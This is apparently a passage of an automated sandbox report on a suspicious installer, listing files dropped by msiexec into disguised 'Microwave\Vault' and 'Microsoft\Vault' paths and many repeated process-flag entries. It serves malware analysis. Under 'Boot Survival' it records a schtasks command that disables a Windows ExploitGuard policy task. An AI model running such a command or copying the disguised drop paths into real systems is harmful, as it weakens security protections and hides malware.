            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF92.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC28.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\networkbroker.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12E1.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2DF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF889.tmpJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeJump to dropped file
            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC26F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC30F.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBFC2.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIBF92.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC28.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12E1.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F3.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC2DF.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF889.tmpJump to dropped file
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\License.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\LICENSE.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\LICENSE-MIT.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\wrap-ansi\node_modules\emoji-regex\LICENSE-MIT.txt
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeFile created: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\readme.txt

            Boot Survival

            barindex
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\JWQgbclQK5.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Microsoft\Vault\EdUpdMachine.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
